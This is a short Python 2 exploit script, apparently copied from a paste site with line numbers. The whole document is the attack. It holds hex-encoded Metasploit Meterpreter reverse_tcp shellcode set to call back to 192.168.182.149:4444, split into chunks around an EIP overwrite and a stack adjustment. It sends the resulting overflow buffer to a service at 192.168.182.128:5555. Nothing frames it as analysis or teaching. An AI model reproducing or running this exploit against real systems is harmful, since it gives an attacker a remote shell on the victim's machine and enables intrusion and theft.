import socket#msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.

1. import socket
2. #msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.182.149 R |msfencode -e x86/alpha_mixed -b "\x40" -t ruby
3. #x86/alpha_mixed succeeded with size 641 (iteration=1)
4. #554 bytes exactly = chunk1
5. shell = ("\x89\xe0\xd9\xc5\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49"
6. "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
7. "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
8. "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
9. "\x75\x4a\x49\x69\x6c\x6b\x58\x6d\x59\x45\x50\x73\x30\x33"
10. "\x30\x53\x50\x6c\x49\x49\x75\x35\x61\x78\x52\x72\x44\x4c"
11. "\x4b\x36\x32\x50\x30\x6c\x4b\x32\x72\x76\x6c\x6c\x4b\x43"
12. "\x62\x75\x44\x6c\x4b\x73\x42\x34\x68\x64\x4f\x4f\x47\x50"
13. "\x4a\x45\x76\x75\x61\x39\x6f\x64\x71\x59\x50\x4c\x6c\x55"
14. "\x6c\x31\x71\x43\x4c\x73\x32\x76\x4c\x57\x50\x6a\x61\x38"
15. "\x4f\x44\x4d\x56\x61\x79\x57\x4a\x42\x38\x70\x62\x72\x70"
16. "\x57\x6e\x6b\x73\x62\x54\x50\x4e\x6b\x33\x72\x37\x4c\x76"
17. "\x61\x6e\x30\x6e\x6b\x63\x70\x51\x68\x6b\x35\x39\x50\x54"
18. "\x34\x42\x6a\x76\x61\x4e\x30\x36\x30\x6c\x4b\x51\x58\x77"
19. "\x68\x6c\x4b\x71\x48\x65\x70\x57\x71\x6b\x63\x59\x73\x57"
20. "\x4c\x73\x79\x4c\x4b\x35\x64\x4c\x4b\x33\x31\x78\x56\x70"
21. "\x31\x39\x6f\x74\x71\x79\x50\x6c\x6c\x59\x51\x4a\x6f\x56"
22. "\x6d\x66\x61\x6a\x67\x34\x78\x4d\x30\x72\x55\x4c\x34\x43"
23. "\x33\x61\x6d\x6b\x48\x75\x6b\x51\x6d\x75\x74\x43\x45\x38"
24. "\x62\x76\x38\x4c\x4b\x30\x58\x66\x44\x55\x51\x6a\x73\x30"
25. "\x66\x6c\x4b\x74\x4c\x50\x4b\x6e\x6b\x43\x68\x57\x6c\x37"
26. "\x71\x39\x43\x4e\x6b\x34\x44\x6e\x6b\x67\x71\x38\x50\x6e"
27. "\x69\x51\x54\x56\x44\x61\x34\x31\x4b\x61\x4b\x55\x31\x63"
28. "\x69\x30\x5a\x32\x71\x69\x6f\x69\x70\x31\x48\x31\x4f\x52"
29. "\x7a\x6c\x4b\x62\x32\x7a\x4b\x6b\x36\x63\x6d\x61\x78\x66"
30. "\x53\x44\x72\x35\x50\x57\x70\x71\x78\x62\x57\x30\x73\x66"
31. "\x52\x43\x6f\x71\x44\x50\x68\x50\x4c\x73\x47\x77\x56\x65"
32. "\x57\x79\x6f\x69\x45\x4d\x68\x7a\x30\x53\x31\x65\x50\x63"
33. "\x30\x74\x69\x6f\x34\x62\x74\x66\x30\x35\x38\x71\x39\x6d"
34. "\x50\x70\x6b\x65\x50\x49\x6f\x4a\x75\x62\x70\x62\x70\x46"
35. "\x30\x72\x70\x51\x50\x56\x30\x31\x50\x36\x30\x65\x38\x6a"
36. "\x4a\x36\x6f\x6b\x6f\x69\x70\x6b\x4f\x4b\x65\x4e\x77\x33"
37. "\x5a\x56\x65\x75\x38\x49\x50\x6f\x58\x68\x36\x6e\x75\x52"
38. "\x48\x77\x72\x73\x30\x56\x71\x51\x4c\x4d\x59\x48\x66\x63"
39. "\x5a\x46\x70\x61\x46\x51\x47\x71\x78\x4c\x59\x49\x35\x73"
40. "\x44\x35\x31\x4b\x4f\x6a\x75\x4d\x55\x4b\x70\x30\x74\x76"
41. "\x6c\x59\x6f\x72\x6e\x76\x68\x72\x55\x7a\x4c\x61\x78\x78"
42. "\x70\x68\x35\x4c\x62\x52\x76\x4b\x4f\x4b\x65\x52\x4a\x53"
43. "\x30\x51\x7a\x33\x34\x76\x36\x51\x47\x50\x68\x56\x62\x79"
44. "\x49\x4b\x78\x63\x6f\x49\x6f\x6a\x75\x4e\x6b\x66\x56\x32"
45. "\x4a\x73\x70\x32\x48\x33\x30\x44\x50\x55\x50\x55\x50\x51"
46. "\x46\x50\x6a\x75\x50\x61\x78\x72\x78\x39\x34\x63\x63\x6d"
47. "\x35\x39\x6f\x49\x45\x4f\x63\x50\x53\x63\x5a\x37\x70\x46"
48. "\x36\x33\x63\x50\x57\x53\x58\x33\x32\x49\x49\x78\x48\x31"
49. "\x4f\x49\x6f\x4e\x35\x66\x61\x68\x43\x56\x49\x4f\x36\x4f"
50. "\x75\x6c\x36\x63\x45\x4a\x4c\x58\x43\x41\x41")
51.  
52. shell_chunk1 = shell[:554]
53. shell_chunk2 = shell[554:]
54. #0x775e3422
55. eip = "\x22\x34\x5e\x77"
56. adjust = "\x81\xc4\x24\xfa\xff\xff"
57. fill = "A" * (1024 - len(shell_chunk2))
58. junk = "D" * (10000 - len(shell_chunk2) - len(fill) - len(eip) - len(adjust) - len(shell_chunk1))
59. buff = shell_chunk2 + fill + eip + adjust + shell_chunk1 + junk
60.  
61. print "chunk 1 is " + str(len(shell_chunk1))
62. print "\nchunk 2 is " + str(len(shell_chunk2))
63. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
64. connect=s.connect(('192.168.182.128',5555))
65. s.send('@F506 '+buff+'@\r\npwnag3\r\n\r\n')
66. s.close()